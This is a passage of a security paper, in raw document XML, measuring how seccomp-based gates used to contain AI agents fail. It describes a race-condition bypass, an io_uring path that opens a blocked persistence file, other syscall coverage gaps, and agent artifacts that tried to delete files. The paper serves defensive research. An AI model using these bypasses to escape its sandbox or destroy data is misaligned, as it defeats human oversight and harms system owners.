        <w:t xml:space="preserve">means that the seccomp notifier _cannot_ be used to implement a security policy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Our contribution here is not the hazard itself but a measured per-attempt rate for it against a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hand-written two-thread target—the race is a property of the mechanism and its scheduler, not of any</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">model-generated workload—and the observation that a gate built this way is shipped as agent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">containment anyway.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Two consequences follow for a threat model. The bypass is architectural, not a gap in the token list,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">so no blocklist patch closes it. And the fix is narrower than it first appears: the second read has to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">be removed, which means not returning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at all for a call whose security-relevant</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">argument is a pointer. The supervisor must perform the operation itself and hand back the result—for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 by injecting the descriptor with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SECCOMP_IOCTL_NOTIF_ADDFD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—or the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">decision must move to a kernel hook that sees the resolved object, which is Part II. Copying the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">argument into supervisor-controlled memory, the intuitive repair, does nothing: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resumes the target’s own syscall with the target’s own pointer, so the supervisor’s copy is never the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">value the kernel consumes. The head-on number—4000/4000—measures the control against a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cooperative target, which the threat model does not assume.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We note one correction to a natural reading of this result. The gate permits exactly one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, the launch of the target itself, and that call fires in a single-threaded context</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">before any agent code runs; every later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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is denied outright. The raceable allow path is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">therefore not the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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">launch but the per-call file-operation allow in persistence mode,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">which fires while the attacker’s threads are live.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="sec:coverage"/>
      <w:r>
        <w:t xml:space="preserve">Coverage is incomplete before any race</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A gate can be sound only over the mechanisms it watches, and the two threat sources of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:threa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do not use the same mechanisms. We compared the footprints of the artifacts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">each source actually produced. The 164 injection artifacts that attempted a dangerous call did so</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">entirely through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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(164/164,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>[</m:t>
        </m:r>
        <m:r>
          <m:t>97.7</m:t>
        </m:r>
        <m:r>
          <m:t>,</m:t>
        </m:r>
        <m:r>
          <m:t>100</m:t>
        </m:r>
        <m:r>
          <m:t>]</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve">): the footprint set is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>{</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:nor/>
            <m:sty m:val="p"/>
            <m:scr m:val="monospace"/>
          </m:rPr>
          <m:t>execve</m:t>
        </m:r>
        <m:r>
          <m:t>}</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve">. Each of those artifacts was additionally run under an unfiltered</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">strace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—every syscall, not the narrowed set—and checked against a watch list of seventeen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">further dangerous calls including</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">unlink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unlinkat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sendto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ptrace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; none appeared in any of the 164. One caveat scopes this</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">check: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was absent from that seventeen-call watch list, so the classifier would not have</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">counted a direct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in an injection artifact, and because the raw traces were classified</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on the fly rather than retained we cannot re-scan them post hoc. The injection payload is a fixed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">shell-out, for which a spontaneous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is off-task and unobserved in the footprints that were</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">recorded; we have added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to the instrument’s watch set</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">invariance.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) so a re-run counts it, but we report the recorded run as scoped rather than</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">claim closure. The separate autonomous analysis (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">matrix_analysis.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) does watch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and counts two, so the direct-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path is measured where it actually occurred. The 45 autonomous</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">artifacts that attempted destruction did so through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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in 82% of cases (37/45,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>[</m:t>
        </m:r>
        <m:r>
          <m:t>68.7</m:t>
        </m:r>
        <m:r>
          <m:t>,</m:t>
        </m:r>
        <m:r>
          <m:t>90.7</m:t>
        </m:r>
        <m:r>
          <m:t>]</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve">; spawning a shell to run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), but through a direct</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">unlink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in 13%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(6/45) and a direct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in 4% (2/45):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the footprint set is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>{</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:nor/>
            <m:sty m:val="p"/>
            <m:scr m:val="monospace"/>
          </m:rPr>
          <m:t>execve</m:t>
        </m:r>
        <m:r>
          <m:t>,</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:nor/>
            <m:sty m:val="p"/>
            <m:scr m:val="monospace"/>
          </m:rPr>
          <m:t>unlink</m:t>
        </m:r>
        <m:r>
          <m:t>,</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:nor/>
            <m:sty m:val="p"/>
            <m:scr m:val="monospace"/>
          </m:rPr>
          <m:t>rmdir</m:t>
        </m:r>
        <m:r>
          <m:t>}</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve">. The two sets share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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and are not equal. The footprint is fixed by the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">mechanism</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the code chooses, not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">by the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">force</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that drove it, and 18% of self-driven destruction (8/45,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>[</m:t>
        </m:r>
        <m:r>
          <m:t>9.3</m:t>
        </m:r>
        <m:r>
          <m:t>,</m:t>
        </m:r>
        <m:r>
          <m:t>31.3</m:t>
        </m:r>
        <m:r>
          <m:t>]</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve">) reaches its goal by a call an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/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gate never sees.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The gap widens at the ABI. Blocking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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">does not cover</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">execveat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on an anonymous</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">descriptor via</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">memfd_create</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; blocking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does not cover</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sendto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sendmsg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on a UDP socket; and a single unblocked</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">io_uring_setup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lets an agent submit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">file and network work as ring operations that never reach the syscall-entry filter.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A blocklist cannot enumerate its way out of this; completeness requires inverting to a default-deny</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">allowlist, and the only class this study could close as a small fixed set is execution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execve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execveat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="the-asynchronous-path-measured."/>
      <w:r>
        <w:t xml:space="preserve">The asynchronous path, measured.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We exercised the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">io_uring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">case as a working</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">bypass rather than leaving it as a reading of the ABI.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">iouring_probe.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">opens the same</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">persistence path twice in one process: once with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">openat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and once as an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">IORING_OP_OPENAT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">submitted through an established ring, using the raw ring interface and no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">helper library. Under the gate in persistence mode—which installs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SCMP_ACT_NOTIFY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openat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—the direct call is denied with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">EPERM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">supervisor counts the denial, while the ring submission opens the file and the file is on disk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">afterwards. The result is 20/20 identical across repeats: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direct</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">openat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ring</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">openat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unprotected baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">opened</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">opened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seccomp persist gate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">denied (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">EPERM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opened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Landlock allowlist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">denied (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">EACCES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denied (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">EACCES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The mechanism is the same one that makes the gate attractive and unsound at once: it sits at syscall</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">entry, and an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">io_uring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">operation is performed inside the kernel without traversing that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">entry. This is a second complete bypass of the same control, structurally unrelated to the TOCTOU race</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">of Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:toctou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and not fixable by removing the second argument read.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Landlock row is the answer to a question we had left open, and it goes the other way. Landlock</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mediates at the LSM hook rather than at syscall entry, and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">io_uring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">performs submitted work</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">under the submitting task’s credentials, so the domain follows the operation onto the ring: the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">asynchronous open is denied exactly as the synchronous one is, and no file is created. We measured</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">this for filesystem opens only, and it should not be read as blanket</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">io_uring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">coverage;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Landlock implements none of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">io_uring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-specific LSM hooks, so ring features that select a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">different credential or bypass the file path—registered personalities,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">IORING_OP_URING_CMD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">device passthrough—are outside what this benchmark establishes.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unlink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/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escape is measured on real artifacts and the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">io_uring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">bypass is measured here; the remaining ABI paths above are coverage gaps read from the filter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">definition and the syscall ABI, and we did not exercise them as exploits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">One gap we expected to find is not there, and the check is worth reporting because the expectation is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">common. A filter scoped to one architecture’s syscall numbers is usually assumed to let the compat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">entries fall through to its default action, and on x86-64 the hazard is real in principle: the x86-64</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and x32 ABIs share</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AUDIT_ARCH_X86_64</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and are distinguished only by</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__X32_SYSCALL_BIT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on the call number, so a deny list written without that bit is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">bypassable by a program that sets it </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Disassembling the BPF program our gate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">actually loads shows both entries closed ahead of the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default: a non-matching audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">architecture branches to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SECCOMP_RET_KILL_THREAD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and so does any call number at or above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</m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">other than</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>−</m:t>
        </m:r>
        <m:r>
          <m:t>1</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve">. The compat path is covered here because</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">libseccomp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">covers it, not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">because the policy does—a filter emitted by hand would have to close it explicitly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="sec:selectivity"/>
      <w:r>
        <w:t xml:space="preserve">Selectivity trades false positives against evasion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The rootful gate is not a disguised deny-all: given a labelled corpus of write paths it denied all</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">seven persistence targets and allowed the ordinary application writes, so it does discriminate on the</w:t>
      </w:r>
